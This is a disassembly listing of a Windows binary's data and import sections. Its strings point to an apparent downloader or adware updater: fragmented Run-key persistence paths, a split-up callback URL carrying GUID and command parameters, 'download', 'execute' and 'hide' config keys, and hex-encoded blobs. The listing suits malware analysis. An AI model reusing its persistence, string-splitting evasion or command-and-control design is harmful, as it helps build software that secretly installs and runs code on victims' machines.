dword_435B90 dd 19930520h, 3, 435BB0h, 5 dup(0) dd 0FFFFFFFFh, 4326F0h, 0
dd offset loc_4326FC
dd 1, 432708h
dword_435BC8 dd 19930520h, 1Ah, 435BE8h, 5 dup(0) dd 0FFFFFFFFh, 432730h, 0
dd offset loc_432739
dd 1, 432742h, 2, 43274Bh, 3, 432754h, 4, 43275Dh, 5, 432769h
dd 6, 432775h, 7, 432781h, 8, 43278Dh, 9, 432799h, 0Ah
dd 4327A5h, 0Bh, 4327B1h, 0Ch, 4327BDh, 0Dh, 4327C9h, 0Eh
dd 4327D5h, 0Fh, 4327E1h, 10h, 4327EDh, 11h, 4327F9h, 12h
dd 432805h, 13h, 432811h, 14h, 43281Dh, 15h, 432829h, 5
dd 432835h, 5, 432841h, 18h, 43284Ah
dword_435CB8 dd 19930520h, 8, 435CD8h, 5 dup(0) dd 0FFFFFFFFh, 432860h, 0
dd offset loc_43286C
dd 0
dd offset loc_432878
dd 0
dd offset loc_432884
dd 0
dd offset loc_432890
dd 0
dd offset loc_43289C
dd 0
dd offset loc_4328A8
dd 0
dd offset loc_4328B4
dword_435D18 dd 19930520h, 2, 435D38h, 1, 435D48h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 435D60h, 4 dup(0)
dd offset loc_42969F
dword_435D70 dd 19930520h, 1, 435D90h, 5 dup(0) dd 0FFFFFFFFh, 4328E0h
dword_435D98 dd 19930520h, 1, 435DB8h, 5 dup(0) dd 0FFFFFFFFh, 432900h
dword_435DC0 dd 19930520h, 1, 435DE0h, 5 dup(0) dd 0FFFFFFFFh, 432920h
dword_435DE8 dd 19930520h, 1, 435E08h, 5 dup(0) dd 0FFFFFFFFh, 432940h, 0
dd offset off_437C48
dd 0
dd 0FFFFFFFFh, 0
dd 10h, 431BB6h, 0
dword_435E30 dd 1, 435E10h dword_435E38 dd 0 dd offset sub_431BE3
dd 0
dd offset dword_435E30
align 200h
HLXc ends
; Section 2. (virtual address 00016000)
; Virtual size : 00009000 ( 36864.)
; Section size in file : 00009000 ( 36864.)
; Offset to raw data for section: 00016000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
HLXc segment para public 'CODE' use32
assume cs:HLXc
;org 436000h
assume es:nothing, ss:nothing, ds:HLXc, fs:nothing, gs:nothing
dword_436000 dd 400h dup(0) dword_437000 dd 0 dd offset sub_4284F0
dd offset sub_4319C1
dword_43700C dd 0 dword_437010 dd 0 dword_437014 dd 3 dup(0) dd offset off_434AE4
align 8
dd 482Eh
dword_43702C dd 6325h off_437030 dd offset off_434AE4 ; DATA XREF: HLXc:00434E2C�o
align 8
a_pavcexception db '.PAVCException@@',0
align 4
aR_0: ; DATA XREF: HLXc:00422558�o
unicode 0, <r>,0
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_4227A4:loc_4227ED�o
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_4227A4:loc_422808�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_4227A4+79�o
align 10h
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_4227A4+8B�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_4227A4+9D�o
align 4
aD_0 db '%d',0 ; DATA XREF: sub_422A1E+102�o
align 4
aOpen db 'OPEN',0 ; DATA XREF: sub_422C48+1E2�o
align 4
a_old db '.old',0 ; DATA XREF: sub_422C48+13F�o
align 4
aInstallzip db 'InstallZip()',0Ah,0 ; DATA XREF: sub_422C48+7B�o
align 4
a_bin db '.bin',0 ; DATA XREF: sub_422C48+3D�o
align 4
aRetryD db '&retry=%d',0 ; DATA XREF: sub_422EC3+4C�o
align 10h
a0: ; DATA XREF: sub_425AD2+6C�o
unicode 0, <0>,0
a02x db '%02X',0 ; DATA XREF: sub_422F54+D1�o
align 4
dword_4370EC dd 0D321C942h, 2212B3F2h, 6608AB02h, 0 ; sub_42309C+8E�o
dword_4370FC dd 6325h dword_437100 dd 74696E49h, 646E7542h, 0A656Chdword_43710C dd 5Ch ; sub_4254CE+38�o ...
aWindows db 'windows',0 ; DATA XREF: sub_42342D+BEB�o
aCrc db 'crc',0 ; DATA XREF: sub_42342D:loc_423F5B�o
aIdentifier db 'identifier',0 ; DATA XREF: sub_42342D:loc_423EE4�o
align 4
aVersion_0 db 'version',0 ; DATA XREF: sub_42342D:loc_423E73�o
aNewupdater db 'newupdater',0 ; DATA XREF: sub_42342D:loc_423E03�o
align 4
aWait db 'wait',0 ; DATA XREF: sub_42342D:loc_423D93�o
align 4
aExecute db 'execute',0 ; DATA XREF: sub_42342D:loc_423D23�o
aHide db 'hide',0 ; DATA XREF: sub_42342D:loc_423CB3�o
align 4
aSavepath db 'SavePath',0 ; DATA XREF: sub_42342D:loc_423C48�o
align 10h
aSaveas db 'SaveAs',0 ; DATA XREF: sub_42342D:loc_423BD1�o
align 4
aParameters db 'parameters',0 ; DATA XREF: sub_42342D:loc_423B60�o
align 4
aFilename db 'filename',0 ; DATA XREF: sub_42342D:loc_423AEF�o
align 10h
aRequiredfile db 'requiredfile',0 ; DATA XREF: sub_42342D:loc_423A7E�o
align 10h
aKeyvalue db 'keyvalue',0 ; DATA XREF: sub_42342D:loc_423A0D�o
align 4
aKey db 'key',0 ; DATA XREF: sub_42342D:loc_4239A2�o
aRootkey db 'rootkey',0 ; DATA XREF: sub_42342D+508�o
aDownload db 'download',0 ; DATA XREF: sub_42342D:loc_423809�o
; sub_424429+5F�o
align 4
aWrNextupdate db 'WR\nextupdate',0 ; DATA XREF: sub_42342D+3A6�o
align 4
aNextupdate db 'nextupdate',0 ; DATA XREF: sub_42342D:loc_4236F8�o
align 10h
aWrP db 'WR\p',0 ; DATA XREF: sub_42342D+282�o
align 4
aPaid db 'paid',0 ; DATA XREF: sub_42342D:loc_4235D7�o
align 10h
aWrConfigversio db 'WR\configversion',0 ; DATA XREF: sub_42342D+161�o
align 4
aConfigversio_0 db 'configversion',0 ; DATA XREF: sub_42342D+84�o
align 4
aS db '%s',0 ; DATA XREF: sub_42342D+6E�o
; sub_42342D+4EA�o ...
align 4
aParsexml db 'ParseXML()',0Ah,0 ; DATA XREF: sub_42342D+2F�o
align 8
dword_437218 dd 2933BF80h, 11D27B36h, 0C0000EB2h, 603E984Fh ; sub_42438B+19�o ...
dword_437228 dd 3Ah dword_43722C dd 765C5257h, 69737265h, 6E6Fh ; sub_4245AA+320�o ...
dword_437238 dd 706D742Eh, 0 dword_437240 dd 6C6F2320h, 3A64haDefaultvalue db 'defaultvalue',0 ; DATA XREF: sub_4252F7+88�o
; sub_425FC6+214�o
align 4
asc_437258: ; DATA XREF: sub_424AE5+652�o
unicode 0, <}>,0
a001 db '001',0 ; DATA XREF: sub_424AE5+5F5�o
a000_1 db '000',0 ; DATA XREF: sub_424AE5+5E3�o
a0a887397a5f2_1 db '0A887397A5F240675EEF4D35019B6883A6FA5D6C5EF8711536AC4C8FA4DA76476'
; DATA XREF: sub_424AE5+4AE�o
db 'DE96109318D40A797',0
align 4
a000 db '0-00',0 ; DATA XREF: sub_424AE5+410�o
align 10h
a000_0 db '-000',0 ; DATA XREF: sub_424AE5+3EF�o
align 4
a0a887397a5f2_0 db '0A887397A5F240675EEF4D35019B6883A6FA5D6C5EF8711536AC4C8FA1CA61566'
; DATA XREF: sub_424AE5+32D�o
db '7C64A0F2DBA65B286D6',0
align 10h
asc_437320: ; DATA XREF: sub_424AE5+2D7�o
; sub_424AE5+30E�o ...
unicode 0, <->,0
a0a887397a5f240 db '0A887397A5F240675EEF4D35019B6883A6FA5D6C5EF8711536AC4C8FB1D67C567'
; DATA XREF: sub_424AE5+228�o
db '0CA643630A642B681C07D505E9B54180FA15B',0
align 4
a67f9198b db '67F9198B',0 ; DATA XREF: sub_424AE5+1BA�o
align 4
a39 db '39',0 ; DATA XREF: sub_424AE5+10E�o
align 4
a67f9158b db '67F9158B',0 ; DATA XREF: sub_424AE5+CB�o
; sub_424AE5+284�o
align 4
asc_4373A8: ; DATA XREF: sub_4252F7+F8�o
unicode 0, < >,0
aNner1 db 'nner1',0 ; DATA XREF: sub_4252F7+6E�o
align 4
aUnRu db 'un\ru',0 ; DATA XREF: sub_4252F7+5D�o
align 4
aTversionR db 'tVersion\R',0 ; DATA XREF: sub_4252F7+4C�o
align 4
aFtWindowsCurre db 'ft\Windows\Curren',0 ; DATA XREF: sub_4252F7+3B�o
align 4
aSoftwareMicros db 'SOFTWARE\Microso',0 ; DATA XREF: sub_4252F7+20�o
align 10h
aGversion db 'gversion',0 ; DATA XREF: sub_4254CE+5A�o
align 4
aConfi db 'confi',0 ; DATA XREF: sub_4254CE+49�o
align 4
aWr db 'WR',0 ; DATA XREF: sub_4254CE+21�o
; sub_4255E6+1B�o ...
align 4
aDate db 'date',0 ; DATA XREF: sub_4255E6+64�o
align 10h
aTup db 'tup',0 ; DATA XREF: sub_4255E6+54�o
aNex db 'nex',0 ; DATA XREF: sub_4255E6+44�o
aP_1: ; DATA XREF: sub_425733+49�o
unicode 0, <p>,0
aI_0: ; DATA XREF: sub_42583A+5A�o
; sub_425952+57�o
unicode 0, <i>,0
aR: ; DATA XREF: sub_42583A+38�o
; sub_425952+35�o ...
unicode 0, <R>,0
aW: ; DATA XREF: sub_42583A+21�o
; sub_425952+1A�o ...
unicode 0, <W>,0
asc_437428: ; DATA XREF: sub_425952+E4�o
unicode 0, <,>,0
aCmd_0 db 'cmd',0 ; DATA XREF: sub_425AD2+57�o
aMd db 'md',0 ; DATA XREF: sub_425C0B+6B�o
align 4
aC: ; DATA XREF: sub_425C0B+5A�o
unicode 0, <c>,0
aAffid db 'affID',0 ; DATA XREF: sub_425D38+1E7�o
align 10h
a34ac53a09bdc7c db '34AC53A09BDC7C',0 ; DATA XREF: sub_425FC6+272�o
align 10h
a11866787a5f240 db '11866787A5F240675EE6610530A652BC94C74E756BC56C0935BA7D9087C160476'
; DATA XREF: sub_425FC6+228�o
db 'CDF5E0330BA48BC9CEF42506DCC7A072F8F48BF97C0564B70',0
align 4
a_exe_tmp db '.exe.tmp',0 ; DATA XREF: sub_425FC6+135�o
align 10h
aInu db 'inu',0 ; DATA XREF: sub_425FC6+12A�o
aOf db 'of',0 ; DATA XREF: sub_425FC6+116�o
align 4
aMr db 'mr',0 ; DATA XREF: sub_425FC6+105�o
align 4
aE: ; DATA XREF: sub_425FC6+DD�o
unicode 0, <e>,0
a_ex db '.ex',0 ; DATA XREF: sub_425FC6+B5�o
aFinu db 'finu',0 ; DATA XREF: sub_425FC6+A1�o
align 4
aRo db 'ro',0 ; DATA XREF: sub_425FC6+90�o
align 10h
aM db '\m',0 ; DATA XREF: sub_425FC6+64�o
align 4
aSei db 'sei ',0Ah,0 ; DATA XREF: sub_4263D6+79�o
align 4
a11a144bf9ef66a db '11A144BF9EF66A4761DE7C0307B1',0 ; DATA XREF: sub_4263D6+43�o
align 4
a31a144bf9e8020 db '31A144BF9E80200C66C764',0 ; DATA XREF: sub_4263D6+18�o
align 4
asc_437534: ; DATA XREF: sub_426584+60�o
unicode 0, <\>,0
asc_437538: ; DATA XREF: sub_426584+AC�o
unicode 0, <\>,0
asc_43753C: ; DATA XREF: sub_426584+107�o
unicode 0, <\>,0
asc_437540: ; DATA XREF: sub_426584+117�o
unicode 0, <\>,0
asc_437544: ; DATA XREF: sub_42692B+8A�o
unicode 0, <\>,0
asc_437548: ; DATA XREF: sub_42692B+D6�o
unicode 0, <\>,0
asc_43754C: ; DATA XREF: sub_42692B+131�o
unicode 0, <\>,0
asc_437550: ; DATA XREF: sub_42692B+141�o
unicode 0, <\>,0
asc_437554: ; DATA XREF: HLXc:00426FE4�o
unicode 0, <\>,0
asc_437558: ; DATA XREF: HLXc:00427030�o
unicode 0, <\>,0
asc_43755C: ; DATA XREF: HLXc:0042708B�o
unicode 0, <\>,0
asc_437560: ; DATA XREF: HLXc:0042709B�o
unicode 0, <\>,0
asc_437564: ; DATA XREF: HLXc:00427507�o
unicode 0, <\>,0
asc_437568: ; DATA XREF: HLXc:00427553�o
unicode 0, <\>,0
asc_43756C: ; DATA XREF: HLXc:004275AE�o
unicode 0, <\>,0
asc_437570: ; DATA XREF: HLXc:004275BE�o
unicode 0, <\>,0
aD db '%d',0 ; DATA XREF: sub_42852F+147�o
align 4
asc_437578 db '&x=',0 ; DATA XREF: sub_42852F+15D�o
aI db '&i=',0 ; DATA XREF: sub_42852F+194�o
aP db '&p=',0 ; DATA XREF: sub_42852F+1CB�o
aCmd db '&cmd=',0 ; DATA XREF: sub_42852F+1D5�o
align 4
aGuid db '&GUID=',0 ; DATA XREF: sub_42852F+22A�o
align 4
aConfigversion db '&configversion=',0 ; DATA XREF: sub_42852F+261�o
aVersion db '&version=',0 ; DATA XREF: sub_42852F+270�o
align 10h
aHtt db 'htt',0 ; DATA XREF: sub_42852F+591�o
aP_0 db 'p://',0 ; DATA XREF: sub_42852F+5AB�o
align 4
aWr_mc db 'wr.mc',0 ; DATA XREF: sub_42852F+5C5�o
align 4
aBo db 'bo',0 ; DATA XREF: sub_42852F+5DF�o
align 4
aO: ; DATA XREF: sub_42852F+5F9�o
unicode 0, <o>,0
a_co db '.co',0 ; DATA XREF: sub_42852F+613�o
aMR db 'm/r',0 ; DATA XREF: sub_42852F+62D�o
aEta db 'eta',0 ; DATA XREF: sub_42852F+647�o
aDpu_ db 'dpu.',0 ; DATA XREF: sub_42852F+661�o
align 10h
aPh db 'ph',0 ; DATA XREF: sub_42852F+67B�o
align 4
aP? db 'p?',0 ; DATA XREF: sub_42852F+695�o
align 4
aOld db 'old',0 ; DATA XREF: sub_42908F+3C1�o
align 10h
dword_4375F0 dd 2933BF81h, 11D27B36h, 0C0000EB2h, 603E984Fh ; sub_429D20+4A�o
aNeedDictiona_0 db 'need dictionary',0 ; DATA XREF: HLXc:off_4332E0�o
aStreamEnd db 'stream end',0 ; DATA XREF: HLXc:004332E4�o
align 4
aFileError db 'file error',0 ; DATA XREF: HLXc:004332EC�o
align 4
aStreamError db 'stream error',0 ; DATA XREF: HLXc:004332F0�o
align 4
aDataError db 'data error',0 ; DATA XREF: HLXc:004332F4�o
align 4
aInsufficientMe db 'insufficient memory',0 ; DATA XREF: HLXc:004332F8�o
aBufferError db 'buffer error',0 ; DATA XREF: HLXc:004332FC�o
align 4
aIncompatibleVe db 'incompatible version',0 ; DATA XREF: HLXc:00433300�o
align 10h
aInvalidLiteral db 'invalid literal/length code',0 ; DATA XREF: sub_42A17E+342�o
aInvalidDistanc db 'invalid distance code',0 ; DATA XREF: sub_42A17E+60E�o
align 4
aInvalidBlockTy db 'invalid block type',0 ; DATA XREF: sub_42B09D+29B�o
align 4
aInvalidStoredB db 'invalid stored block lengths',0 ; DATA XREF: sub_42B09D+3D8�o
align 4
aTooManyLengthO db 'too many length or distance symbols',0 ; DATA XREF: sub_42B09D+7D2�o
aInvalidBitLeng db 'invalid bit length repeat',0 ; DATA XREF: sub_42B09D+DE1�o
align 4
aOversubscribed db 'oversubscribed dynamic bit lengths tree',0 ; DATA XREF: sub_42CD2E+65�o
aIncompleteDyna db 'incomplete dynamic bit lengths tree',0 ; DATA XREF: sub_42CD2E+7F�o
aOversubscrib_0 db 'oversubscribed literal/length tree',0 ; DATA XREF: sub_42CDD6+84�o
align 4
aIncompleteLite db 'incomplete literal/length tree',0 ; DATA XREF: sub_42CDD6+96�o
align 4
aOversubscrib_1 db 'oversubscribed distance tree',0 ; DATA XREF: sub_42CDD6+119�o
align 4
aIncompleteDist db 'incomplete distance tree',0 ; DATA XREF: sub_42CDD6+12B�o
align 4
aEmptyDistanceT db 'empty distance tree with lengths',0 ; DATA XREF: sub_42CDD6+144�o
align 4
aInvalidDista_0 db 'invalid distance code',0 ; DATA XREF: sub_42CF86+3A8�o
align 10h
aInvalidLiter_0 db 'invalid literal/length code',0 ; DATA XREF: sub_42CF86+586�o
a1_1_3 db '1.1.3',0 ; DATA XREF: HLXc:0042DABA�o
align 4
a1_1_3_0 db '1.1.3',0 ; DATA XREF: sub_42DBE5+6�o
align 4
byte_43785C db 31h ; DATA XREF: sub_42DBE5+20�r
db 2Eh, 31h, 2Eh
dd 33h
aUnknownCompres db 'unknown compression method',0 ; DATA XREF: sub_42DD65+D1�o
align 10h
aInvalidWindowS db 'invalid window size',0 ; DATA XREF: sub_42DD65+113�o
aIncorrectHeade db 'incorrect header check',0 ; DATA XREF: sub_42DD65+1B1�o
align 4
aNeedDictionary db 'need dictionary',0 ; DATA XREF: sub_42DD65+3C3�o
aIncorrectDataC db 'incorrect data check',0 ; DATA XREF: sub_42DD65+64C�o
align 4
asc_4378D4: ; DATA XREF: sub_42FFCE+39�o
unicode 0, <\>,0
aUt db 'UT',0 ; DATA XREF: sub_43007C+4AC�o
align 4
a__ db '../',0 ; DATA XREF: sub_4308E2+32D�o
a___0 db '..\',0 ; DATA XREF: sub_4308E2+349�o
aUnknownZipResu db 'unknown zip result code',0 ; DATA XREF: HLXc:loc_430E59�o
aSuccess db 'Success',0 ; DATA XREF: HLXc:loc_430FDF�o
aCuldnTDuplicat db 'Culdn',27h,'t duplicate handle',0 ; DATA XREF: HLXc:loc_430FEB�o
align 10h
aCouldnTCreateO db 'Couldn',27h,'t create/open file',0 ; DATA XREF: HLXc:loc_430FF7�o
align 4
aFailedToAlloca db 'Failed to allocate memory',0 ; DATA XREF: HLXc:loc_431003�o
align 4
aErrorWritingTo db 'Error writing to file',0 ; DATA XREF: HLXc:loc_43100F�o
align 10h
aFileNotFoundIn db 'File not found in the zipfile',0 ; DATA XREF: HLXc:loc_43101B�o
align 10h
aStillMoreDataT db 'Still more data to unzip',0 ; DATA XREF: HLXc:loc_431027�o
align 4
aZipfileIsCorru db 'Zipfile is corrupt or not a zipfile',0 ; DATA XREF: HLXc:loc_431030�o
aErrorReadingFi db 'Error reading file',0 ; DATA XREF: HLXc:loc_431039�o
align 4
aCallerFaultyAr db 'Caller: faulty arguments',0 ; DATA XREF: HLXc:loc_431042�o
align 10h
aCallerTheFileH db 'Caller: the file had already been partially unzipped',0
; DATA XREF: HLXc:loc_43104B�o
align 4
aCallerCanOnlyG db 'Caller: can only get memory of a memory zipfile',0
; DATA XREF: HLXc:loc_431054�o
aCallerNotEnoug db 'Caller: not enough space allocated for memory zipfile',0
; DATA XREF: HLXc:loc_43105D�o
align 10h
aCallerThereWas db 'Caller: there was a previous error',0 ; DATA XREF: HLXc:loc_431066�o
align 4
aCallerAddition db 'Caller: additions to the zip have already been ended',0
; DATA XREF: HLXc:loc_43106F�o
align 4
aCallerMixingCr db 'Caller: mixing creation and opening of zip',0
; DATA XREF: HLXc:loc_431078�o
align 4
aZipBugInternal db 'Zip-bug: internal initialisation not completed',0
; DATA XREF: HLXc:loc_431081�o
align 4
aZipBugTryingTo db 'Zip-bug: trying to seek the unseekable',0 ; DATA XREF: HLXc:loc_43108A�o
align 10h
aZipBugTheAntic db 'Zip-bug: the anticipated size turned out wrong',0
; DATA XREF: HLXc:loc_431093�o
align 10h
aZipBugTriedToC db 'Zip-bug: tried to change mind, but not allowed',0
; DATA XREF: HLXc:loc_43109C�o
align 10h
aZipBugAnIntern db 'Zip-bug: an internal error during flation',0
; DATA XREF: HLXc:loc_4310A5�o
align 10h
off_437C10 dd offset off_434AE4 ; DATA XREF: HLXc:off_434B00�o
; HLXc:00434B3C�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
align 10h
dword_437C30 dd 1 align 8
dword_437C38 dd 0DF0B3D60h, 101B548Fh, 8658Eh, 19D12B2Bhoff_437C48 dd offset off_434AE4 ; DATA XREF: HLXc:off_434B48�o
; HLXc:00434B84�o ...
align 10h
a_?av_com_error db '.?AV_com_error@@',0
align 8
a8b db '8B',0 ; DATA XREF: sub_421ACF+24�o
; sub_421ACF+64�o ...
align 4
dd 7FFh dup(0)
byte_439C68 db 0 ; DATA XREF: HLXc:00421B9A�r
align 4
byte_439C6C db 0 ; DATA XREF: HLXc:00421BB5�r
align 10h
byte_439C70 db 0 ; DATA XREF: sub_421C92+25�r
align 4
byte_439C74 db 0 ; DATA XREF: sub_421D8A+A�r
align 4
byte_439C78 db 0 ; DATA XREF: sub_421D8A+25�r
align 4
byte_439C7C db 0 ; DATA XREF: HLXc:00421E90�r
align 10h
byte_439C80 db 0 ; DATA XREF: HLXc:00421EAB�r
align 4
byte_439C84 db 0 ; DATA XREF: HLXc:00421F65�r
align 4
byte_439C88 db 0 ; DATA XREF: HLXc:loc_421FCB�r
align 4
byte_439C8C db 0 ; DATA XREF: HLXc:00422050�r
align 10h
byte_439C90 db 0 ; DATA XREF: HLXc:0042206B�r
align 4
byte_439C94 db 0 ; DATA XREF: HLXc:loc_422104�r
align 4
byte_439C98 db 0 ; DATA XREF: sub_422296+A�r
align 4
dword_439C9C dd 0 byte_439CA0 db 0 ; DATA XREF: sub_422F54+1B�r
; sub_422F54:loc_42304D�o ...
align 4
word_439CA4 dw 0 ; DATA XREF: sub_424AE5+2E�r
align 4
dword_439CA8 dd 0 dword_439CAC dd 0 dword_439CB0 dd 0 dword_439CB4 dd 0 dword_439CB8 dd 0 dword_439CBC dd 0 dword_439CC0 dd 0 dword_439CC4 dd 0 dword_439CC8 dd 0 dword_439CCC dd 0 dword_439CD0 dd 0 dword_439CD4 dd 0 dword_439CD8 dd 0 dword_439CDC dd 0 dword_439CE0 dd 0 dword_439CE4 dd 0 dword_439CE8 dd 0 dword_439CEC dd 0 dword_439CF0 dd 0 ; sub_428520+3�o ...
aJSJSJSJS db 'ssss',0
align 4
aJSJS db 'ss',0
align 4
dd 325000h, 325050h, 73EA86D4h, 801h dup(0)
dd offset off_4332DC
align 10h
dword_43BD30 dd 0 ; sub_42908F+41�o ...
dword_43BD34 dd 0 ; sub_43110B+73�w ...
dword_43BD38 dd 0 dword_43BD3C dd 3 dup(0) dword_43BD48 dd 0 dword_43BD4C dd 0 dword_43BD50 dd 0 dword_43BD54 dd 0 dword_43BD58 dd 4 dup(0) dword_43BD68 dd 0 dword_43BD6C dd 0FFFFFFFFh ; HLXc:004317EE�w
dword_43BD70 dd 0FFFFFFFFh ; sub_431776+1A�o ...
dd 4A3h dup(0)
dd 140h, 12018h, 65724301h, 46657461h, 41656C69h, 65520100h
dd 69466461h, 100656Ch, 736F6C43h, 6E614865h, 656C64h
dd 74654701h, 656C6946h, 657A6953h, 65470100h, 73614C74h
dd 72724574h, 100726Fh
aGetcurrentdire db 'GetCurrentDirectoryA',0
db 1, 43h, 72h
aEatedirectorya db 'eateDirectoryA',0
db 1
aRemovedirector db 'RemoveDirectoryA',0
db 1, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
db 1, 47h, 65h
aTfileattribu_0 db 'tFileAttributesA',0
db 1, 46h, 69h
aNdclose db 'ndClose',0
db 1
aUnmapviewoffil db 'UnmapViewOfFile',0
db 1, 53h, 65h
aTcurrentdirect db 'tCurrentDirectoryA',0
db 1
aGlobalfree db 'GlobalFree',0
db 1
aWritefile db 'WriteFile',0
dw 4601h
aReelibrary db 'reeLibrary',0
db 1
aGlobalrealloc db 'GlobalReAlloc',0
dw 4701h
aLobalalloc db 'lobalAlloc',0
db 1
aGetprocaddress db 'GetProcAddress',0
db 1
aLocalfree db 'LocalFree',0
dw 5701h
aIdechartomulti db 'ideCharToMultiByte',0
db 1
aMultibytetowid db 'MultiByteToWideChar',0
dd 70614D01h, 77656956h, 6946664Fh, 100656Ch
aCreatefilemapp db 'CreateFileMappingA',0
db 1
aLstrcata db 'lstrcatA',0
db 1, 53h, 65h
aTlasterror db 'tLastError',0
db 1
aFindfirstfilea db 'FindFirstFileA',0
db 1
aFindnextfilea db 'FindNextFileA',0
dw 4701h
aEtstartupinfoa db 'etStartupInfoA',0
db 1
aGetmodulehandl db 'GetModuleHandleA',0
db 1, 53h, 65h
aTfiletime db 'tFileTime',0
dw 4401h
aOsdatetimetofi db 'osDateTimeToFileTime',0
db 1, 53h, 79h
aStemtimetofile db 'stemTimeToFileTime',0
db 1
aGetcurrentproc db 'GetCurrentProcess',0
dw 4401h
aUplicatehandle db 'uplicateHandle',0
db 1
aGetfiletype db 'GetFileType',0
db 1
aSetfilepointer db 'SetFilePointer',0
db 1
aInterlockedinc db 'InterlockedIncrement',0
dw 4301h
aReatemutexa db 'reateMutexA',0
db 1
aLstrlena db 'lstrlenA',0
dw 4701h
aEtvolumeinform db 'etVolumeInformationA',0
db 1, 47h, 65h
aTsystemdefault db 'tSystemDefaultLCID',0
db 1
aGetlocaleinfoa db 'GetLocaleInfoA',0
db 1
aInterlockeddec db 'InterlockedDecrement',0
db 1, 6Ch, 73h
aTrcpyna db 'trcpynA',0
db 1
aLstrcpya db 'lstrcpyA',0
dw 5701h
aAitforsingleob db 'aitForSingleObject',0
db 1
aGetwindowsdire db 'GetWindowsDirectoryA',0
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
db 1, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
db 1
aSleep db 'Sleep',0
dw 4D00h
dd 1, 1000120h, 43676552h, 65736F6Ch, 79654Bh, 67655201h
dd 6E65704Fh, 4579654Bh, 1004178h, 53676552h, 61567465h
dd 4565756Ch, 1004178h, 43676552h, 74616572h, 79654B65h
dd 417845h, 67655201h, 72657551h, 6C615679h, 78456575h
dd 5A000041h, 0E8000001h, 0FF000120h, 12FF1B10h, 164EFF1Bh
dd 0FF03ABFFh, 0ADFF039Eh, 0B63FF03h, 0FF0339FFh, 33FF15C4h
dd 1021FF16h, 0FF039CFFh, 1CFF039Ah, 35AFF02h, 0FF0320FFh
dd 17FF035Ch, 959FF02h, 0FF0219FFh, 64000337h, 40000001h
dd 1000121h
a?sh_read@fileb db '?sh_read@filebuf@@2HB',0
dw 3F01h
aIs_open@ifstre db 'is_open@ifstream@@QBEHXZ',0
db 1, 3Fh, 66h
aAil@ios@@qbehx db 'ail@ios@@QBEHXZ',0
dd 65723F01h, 69406461h, 65727473h, 40406D61h, 41454151h
dd 40315641h, 48444150h, 1005A40h, 6F63673Fh, 40746E75h
dd 72747369h, 406D6165h, 45425140h, 5A5848h, 6C633F01h
dd 4065736Fh, 74736669h, 6D616572h, 41514040h, 5A585845h
dd 3F3F0100h, 6669445Fh, 65727473h, 40406D61h, 58454151h
dd 1005A58h, 69303F3Fh, 72747366h, 406D6165h, 45415140h
dd 5A5840h, 706F3F01h, 69406E65h, 72747366h, 406D6165h
dd 45415140h, 44425058h, 5A404848h, 1700000h, 21680000h
dd 3F010001h, 243F313Fh, 69736162h, 74735F63h, 676E6972h
dd 3F554440h, 61686324h, 72745F72h, 73746961h, 73404440h
dd 40406474h, 61243F56h, 636F6C6Ch, 726F7461h, 32404440h
dd 74734040h, 51404064h, 58404541h, 3F01005Ah, 243F303Fh
dd 69736162h, 74735F63h, 676E6972h, 3F554440h, 61686324h
dd 72745F72h, 73746961h, 73404440h, 40406474h, 61243F56h
dd 636F6C6Ch, 726F7461h, 32404440h, 74734040h, 51404064h
dd 41404541h, 243F5642h, 6F6C6C61h, 6F746163h, 40444072h
dd 5A404031h, 733F0100h, 74736275h, 243F4072h, 69736162h
dd 74735F63h, 676E6972h, 3F554440h, 61686324h, 72745F72h
dd 73746961h, 73404440h, 40406474h, 61243F56h, 636F6C6Ch
dd 726F7461h, 32404440h, 74734040h, 51404064h, 413F4542h
dd 40323156h, 5A404949h, 663F0100h, 5F646E69h, 7473616Ch
dd 40666F5Fh, 6162243Fh, 5F636973h, 69727473h, 4440676Eh
dd 63243F55h, 5F726168h, 69617274h, 44407374h, 64747340h
dd 3F564040h, 6C6C6124h, 7461636Fh, 4440726Fh, 40403240h
dd 40647473h, 45425140h, 40494449h, 3F01005Ah, 736F706Eh
dd 62243F40h, 63697361h, 7274735Fh, 40676E69h, 243F5544h
dd 72616863h, 6172745Fh, 40737469h, 74734044h, 56404064h
dd 6C61243Fh, 61636F6Ch, 40726F74h, 40324044h, 64747340h
dd 49324040h, 3F010042h, 243F343Fh, 69736162h, 74735F63h
dd 676E6972h, 3F554440h, 61686324h, 72745F72h, 73746961h
dd 73404440h, 40406474h, 61243F56h, 636F6C6Ch, 726F7461h
dd 32404440h, 74734040h, 51404064h, 41414541h, 40313056h
dd 30564241h, 5A404031h, 3F3F0100h, 62243F30h, 63697361h
dd 7274735Fh, 40676E69h, 243F5544h, 72616863h, 6172745Fh
dd 40737469h, 74734044h, 56404064h, 6C61243Fh, 61636F6Ch
dd 40726F74h, 40324044h, 64747340h, 41514040h, 42414045h
dd 40313056h, 1005A40h, 7373613Fh, 406E6769h, 6162243Fh
dd 5F636973h, 69727473h, 4440676Eh, 63243F55h, 5F726168h
dd 69617274h, 44407374h, 64747340h, 3F564040h, 6C6C6124h
dd 7461636Fh, 4440726Fh, 40403240h, 40647473h, 45415140h
dd 31564141h, 42504032h, 5A4044h, 5F633F01h, 40727473h
dd 6162243Fh, 5F636973h, 69727473h, 4440676Eh, 63243F55h
dd 5F726168h, 69617274h, 44407374h, 64747340h, 3F564040h
dd 6C6C6124h, 7461636Fh, 4440726Fh, 40403240h, 40647473h
dd 45425140h, 58444250h, 3F01005Ah, 657A6973h, 62243F40h
dd 63697361h, 7274735Fh, 40676E69h, 243F5544h, 72616863h
dd 6172745Fh, 40737469h, 74734044h, 56404064h, 6C61243Fh
dd 61636F6Ch, 40726F74h, 40324044h, 64747340h, 42514040h
dd 5A584945h, 3F3F0100h, 64747338h, 41594040h, 42414E5Fh
dd 62243F56h, 63697361h, 7274735Fh, 40676E69h, 243F5544h
dd 72616863h, 6172745Fh, 40737469h, 74734044h, 56404064h
